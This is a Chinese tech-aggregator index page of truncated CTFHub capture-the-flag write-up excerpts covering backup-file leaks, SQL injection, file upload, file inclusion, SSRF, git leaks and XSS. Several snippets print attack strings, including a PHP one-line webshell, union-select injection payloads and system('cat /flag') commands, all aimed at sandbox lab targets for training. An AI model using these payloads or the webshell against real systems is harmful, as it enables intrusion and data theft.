ICode9

精准搜索请尝试: 精确搜索
  • CTFHUB-WEB-备份文件下载-bak2021-10-15 14:34:13

    1.bak文件        2.使用dirsearch进行扫描 python dirsearch.py -u http://challenge-d4234042e1d43e96.sandbox.ctfhub.com:10080/ -e *    3.下载bak文件,获取flag  

  • CTFHUB-HTTP协议-基础认证(通过字典爆破解决)2021-10-11 15:35:22

    1.根据题意,点击click,输入admin admin测试    2.根据测试,经过base64转义,下载附件发现是字典,采取爆破的办法    3.找到响应码200的那条,打开,将转义后的编码重新解密    4.获得正确的账号密码,登录获得flag      

  • CTFhub技能树-信息泄露(1)2021-09-25 18:00:26

    目录遍历和phpinfo没什么难度,基本就是一个一个找就行了 练习题目都挺简单的,希望大家尽量先不要看解法自己做一下试试。 备份文件下载:当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。 一、网站源码:这个已经给出了明确的提示

  • CTFHub 文件上传-前端js验证2021-08-26 15:33:55

        根据题目提示去查看源代码中的js脚本   在函数checkfilesuffix()中定义了一个白名单whitelist,通过变量file_suffix可以看出该网站需要验证的是上传文件的后缀, indexOf()返回-1时说明未查找到字符串,综上可得出上传的文件只能是以.jpg、.png、.gif为后缀的 得出这一结论后,

  • CTFHub 文件上传-无验证2021-08-26 15:01:04

           由题目可以知道,网站对于我们上传的任何文件都不做验证      可以确定思路:上传木马->获取靶机shell->在网站中寻找flag      我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?>   保存为test.php上传至网站中        可以得到上传文件的相对路径:u

  • CTFHub-mysql结构2021-08-24 15:04:16

    手工注入     输入1,发现存在两个注入点         验证两个注入点:0 union select 1,2         得到所使用的的数据库信息和版本信息:0 union select database(),version  (返回的字段数必须和注入点数量一致)         通过数据库去查找表:0 union select 1,group_

  • CTFHub SQl注入 时间盲注(sqlmap)2021-08-07 17:58:47

    CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、

  • ctfhub-历年真题web-framework2021-07-13 21:06:23

    为了不打乱节奏, 先放上官方的 writeup 等我整明白了 在写一篇自己的理解 传送门

  • CTFHUB-RCE-文件包含2021-07-11 10:03:58

    考点 php伪协议 file协议 分析过程 Shell是这个 使用hackbar 构造Playload传参 http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt ctfhub=system('ls /'); ctfhub=system('cat /flag'); 得到flag ctfhub{3a551fa301f8dda0dccd2c7d} php://input

  • Day3 CTFhub2021-06-11 22:30:02

    Day3 CTFhub 1.信息泄露-git 1.1 Log (1)GitHack GitHack下载地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用测试脚本,通过泄露的文件,还原重建工程源代码。 python3 dirsearch.py -u <url> -e * 发现了git泄露 (2)使用GitHack进行文件恢复 python2 GitHack.

  • ctfhub web 信息泄露 hg泄露2021-06-11 20:05:55

    还是用desearch工具扫描然后发现hg泄露 用dvcs-ripper这个工具里的hg泄露工具处理 处理完以后看爆出来的文件夹,还是要注意一下因为是隐藏文件,要用ls -al命令 然后进行目录遍历 这里最后出现这个提示以后,我们试试直接访问那个txt ok了

  • CTFHub-网站源码-wp2021-06-07 21:57:23

    根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本 import requests url=(input("URL:")) list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] list2=['tar'

  • 文件包含————ctfhub之读取源文件2021-05-29 22:33:57

    php://filter php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini: php://filter在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on 举例: http://127.0.0.1/cmd.php?file=php://filter/read

  • CTFHub Web真题(7星)2021-05-20 13:01:23

    文章目录 七星难度SQL注入-2(字符布尔盲注)namp(nmap命令注入)shrine(Jinja SSTI)Web1(sql注入过滤)easy_login(nodejs JWT攻击) 七星难度 SQL注入-2(字符布尔盲注) fuzz admin字段发现会有两种结果账号不存在,和账号和密码错误 测试payload分别为admin' and 1=1 and 'tt

  • CTFHUB-RCE漏洞总结(二)2021-05-19 16:34:06

    CTFHUB-RCE漏洞总结(二) 一级目录一级目录一级目录一级目录 链接: CTFHUB-RCE漏洞总结(一). 一级目录 一级目录 一级目录 一级目录

  • CTFhub--SSRF2021-05-17 22:32:20

    ~目录~ 开始内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议Redis协议URL Bypass数字IP Bypass302跳转 BypassDNS重绑定 Bypass 开始 redis真不会…,求会的师傅评论区教教我 内网访问 提示:尝试访问位于127.0.0.1的flag.php吧 直接url=127.0.0.1/flag.php 伪

  • [CTFHub]默认口令(web>密码口令)2021-05-12 09:04:08

    根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令 最后得到flag

  • CTFHub Git泄露-log解题思路2021-05-02 17:29:52

    文章目录 一、什么是Git泄露?二、进入环境2.查看页面3.使用dirsearch扫描目录4.利用GitHack工具扫描4.使用git log查看历史记录 三、flag1.使用git diff对比文件得到flag:==ctfhub{7695df0273bfd39a86c8ecd4}== 2.利用git reset回退文件版本1)打开文件发现flagflag:==ctfhub{7

  • CTFHUB-HTTP协议2021-04-19 08:04:08

    前言 在CTFHUB这个平台上看到了有一组题是HTTP类型的。还蛮好奇的,想着试着玩儿一下。 请求方式 方法一      上面提示我们HTTP协议中定义了八种请求方法。这八种都有: 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务

  • ctfhub-密码口令2021-04-19 06:01:10

    弱口令 打开环境进去后直接用户名:admin;密码:123456登录就拿到flag 默认口令 然后我们进入到环境里    是eyou邮件网此题提示我们使用默认口令,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令    尝试登录一下    就可以拿到flag

  • CTFHUB-信息泄漏2021-04-19 05:32:10

    前言 又来更博了~~今天我们学习一下信息泄漏的相关知识,利用CTFhub上面的题,了解一下。 目录遍历 第一关,我们先打开靶场      我们先点击一下,打开之后,发现这是是apache的目录遍历      那我们挨个的找一下      在这里发现了flag.txt,打开,便找到了flag      PHPINFO

  • CTFHub之RCE2021-04-17 18:34:15

    应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞 常用命令执行函数 system():  该函数会把执行结果输出。passthru():  该函数只调用命令,并把运行结果原样地直接输出没有返回值exec():  不输

  • CTFHub-信息泄露2021-03-28 18:32:47

    目录遍历 import requests url = "http://challenge-6225e10eca4ac8d8.sandbox.ctfhub.com:10080/flag_in_here" for i in range(1,5): for j in range(1,5): url_final = url + "/" + str(i) + "/" + str(j) r = request

  • ctfhub网站源码解题2021-03-19 09:04:30

    进入环境 得到这种提示,于是自己编写一个程序来跑一下目录 url = "http://challenge-e749c0aceae6a664.sandbox.ctfhub.com:10080/" file = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] houz =

  • Ctfhub解题 web XSS反射型2021-03-16 22:34:02

    Ctfhub解题 web XSS反射型 介绍:记录解题过程 XSS Reflex提交1,弹窗 利用XSS platform平台 在XSS platform平台上面注册一个账号,创建一个项目:(根据提示创建即可) 配置 查看代码 根据提示,把XSS平台给出的代码复制到第一个输入框(XSS Reflex)中进行注入 提交后,在

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有